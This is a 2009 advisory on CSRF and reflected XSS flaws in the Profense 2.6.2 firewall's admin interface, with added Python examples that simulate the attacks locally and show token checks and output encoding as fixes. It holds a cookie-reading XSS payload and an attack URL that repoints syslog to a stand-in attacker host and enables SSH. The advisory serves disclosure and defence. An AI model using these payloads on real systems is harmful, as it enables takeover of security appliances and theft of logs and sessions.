Profense Web Application Firewall 2.6.2 - CSRF/XSS Vulnerabilities

ID SSV:66247
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


                                                Written By Michael Brooks
Special thanks to str0ke!

Affects: Profense Web Application Firewall (XSRF and XSS)
Version: 2.6.2

"Defenses against all OWASP Top Ten vulnerabilities"
 Too bad it doesn't defend itself against all of these vulnerabilities....

Changing configuration (via CSRF):
DNS, SMTP, NTP servers.
Set a (malicious) remote FTP or SCP server as the backup target, so the
configuration files are "backed up" to (i.e. stolen by) the attacker.
Set a remote syslog server to steal the logs.
Enable SSH.
Enable SNMP.
<img src=>
Apply new configurations:
<img src=>

Add a proxy:
<img src=>

Turn off the Profense machine:
<img src=>

Force the Profense server to ping:
<img src=>
Pointed at an attacker-controlled host, this notifies the attacker that the attack succeeded.
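The configuration changes listed above all share one root cause: the admin interface applies settings from an authenticated GET, and a browser attaches the admin's session cookie to any cross-site image fetch. The following is an added example, not Profense code, that simulates that design next to a hardened one requiring POST plus a per-session synchronizer token. The path /admin/config, the parameter names, the hostnames and the token scheme are assumptions for illustration, not the product's real interface.

```python
"""
Added example, not Profense code: a stand-in for the appliance's admin
interface that shows why every configuration change listed above can be
triggered by an <img src=...> on an attacker's page, and what closes the
hole.  The path /admin/config, the parameter names, the hostnames and the
token scheme are assumptions for illustration, not the product's real
interface.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

WAF_ORIGIN = "https://waf.example.internal"          # assumed appliance address
ATTACKER_HOST = "attacker.example.net"                # assumed attacker host
# What the attacker's page embeds as <img src="...">: one GET that repoints
# remote syslog at the attacker and turns on SSH, the kind of change the
# advisory lists.
ATTACK_IMG_SRC = (WAF_ORIGIN + "/admin/config"
                  f"?syslog_server={ATTACKER_HOST}&ssh_enabled=yes")


@dataclass
class Request:
    method: str
    url: str
    cookies: dict = field(default_factory=dict)   # attached by the browser
    form: dict = field(default_factory=dict)      # POST body, if any


class AdminApp:
    """One logged-in admin; config is what the attacker wants to flip."""

    def __init__(self, require_token: bool):
        self.require_token = require_token
        self.session_id = secrets.token_hex(16)
        self.csrf_token = secrets.token_hex(16)   # embedded only in the admin's own pages
        self.config = {"syslog_server": "10.0.0.5", "ssh_enabled": "no"}

    def handle(self, req: Request) -> int:
        # The session cookie is the only thing the vulnerable design checks.
        if not hmac.compare_digest(req.cookies.get("session", ""), self.session_id):
            return 403
        if self.require_token:
            # Hardened: mutations need POST plus a synchronizer token.  A
            # cross-origin page can make the browser send the cookie, but the
            # same-origin policy keeps it from reading the token to include it.
            if req.method != "POST":
                return 405
            if not hmac.compare_digest(req.form.get("csrf_token", ""), self.csrf_token):
                return 403
            params = req.form
        else:
            # Vulnerable: any authenticated GET applies the query string.
            params = {k: v[0] for k, v in parse_qs(urlsplit(req.url).query).items()}
        for key in ("syslog_server", "ssh_enabled"):
            if key in params:
                self.config[key] = params[key]
        return 200


def csrf_via_img(app: AdminApp) -> int:
    """Victim admin, still logged in, views a page containing
    <img src=ATTACK_IMG_SRC>.  The browser issues a GET and attaches the
    session cookie automatically."""
    return app.handle(Request("GET", ATTACK_IMG_SRC, cookies={"session": app.session_id}))


def csrf_via_autosubmit_form(app: AdminApp) -> int:
    """Attacker upgrades to a self-submitting cross-site form: POST with
    the cookie, but still without the token."""
    return app.handle(Request("POST", WAF_ORIGIN + "/admin/config",
                              cookies={"session": app.session_id},
                              form={"syslog_server": ATTACKER_HOST}))


def legitimate_change(app: AdminApp, syslog_server: str) -> int:
    """The admin's own form submission carries the token from the page."""
    return app.handle(Request("POST", WAF_ORIGIN + "/admin/config",
                              cookies={"session": app.session_id},
                              form={"syslog_server": syslog_server,
                                    "csrf_token": app.csrf_token}))


if __name__ == "__main__":
    vulnerable = AdminApp(require_token=False)
    print("vulnerable, <img> CSRF:", csrf_via_img(vulnerable), vulnerable.config)
    hardened = AdminApp(require_token=True)
    print("hardened, <img> CSRF:  ", csrf_via_img(hardened), hardened.config)
    print("hardened, form CSRF:   ", csrf_via_autosubmit_form(hardened), hardened.config)
    print("hardened, legit POST:  ", legitimate_change(hardened, "10.0.0.9"), hardened.config)
```

The same image trick is what makes the "force the server to ping" item useful as a beacon: an image whose URL makes the appliance ping an attacker-controlled host tells the attacker the earlier images were fetched while an admin was logged in. The fix is the same for every endpoint: no state change on GET, and a token the attacker's origin cannot read.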

Reflected XSS payload: >"<script>alert(document.cookie)</script>
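Why that payload starts with `>"`: the `>` closes an unquoted attribute or tag and the `"` closes a double-quoted attribute, so one string escapes from either context before the `<script>` lands in the page. The following is an added example, not the product's markup, that reflects the payload into an assumed unquoted `value=` attribute, parses the result the way a browser would, and shows the attribute-context output encoding that stops it. The form and the reflection point are assumptions; the advisory does not say where the parameter is echoed.

```python
"""
Added example (not Profense code): how the reflected payload above breaks
out of its context, and the output encoding that stops it.  The search form
and the unquoted value= reflection point are assumptions for illustration.
"""
import html
from html.parser import HTMLParser

PAYLOAD = '>"<script>alert(document.cookie)</script>'


def render_vulnerable(q: str) -> str:
    # Reflects user input into an unquoted attribute with no encoding.  The
    # leading '>' of the payload closes the <input> tag; the '"' is there so
    # the same payload also escapes from a double-quoted attribute.
    return f'<form><input type="text" name="q" value={q}></form>'


def render_fixed(q: str) -> str:
    # Attribute-context output encoding: quote the attribute and entity-encode
    # <, >, &, " and ' so the parser never leaves the attribute value.
    return f'<form><input type="text" name="q" value="{html.escape(q, quote=True)}"></form>'


class TagCollector(HTMLParser):
    """Records every start tag the parser sees, in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(markup: str) -> list:
    p = TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def script_executes(markup: str) -> bool:
    """True if a <script> element ends up in the parsed tree, i.e. the
    payload escaped its attribute and would run in a browser."""
    return "script" in start_tags(markup)


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        out = render(PAYLOAD)
        print(f"{name}: script runs = {script_executes(out)}\n  {out}")
```

`alert(document.cookie)` is only the proof: with a reflected XSS on the WAF's own admin interface, the same injection point can carry the CSRF requests above or exfiltrate the admin session, so the two findings compound.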

# [2009-01-29]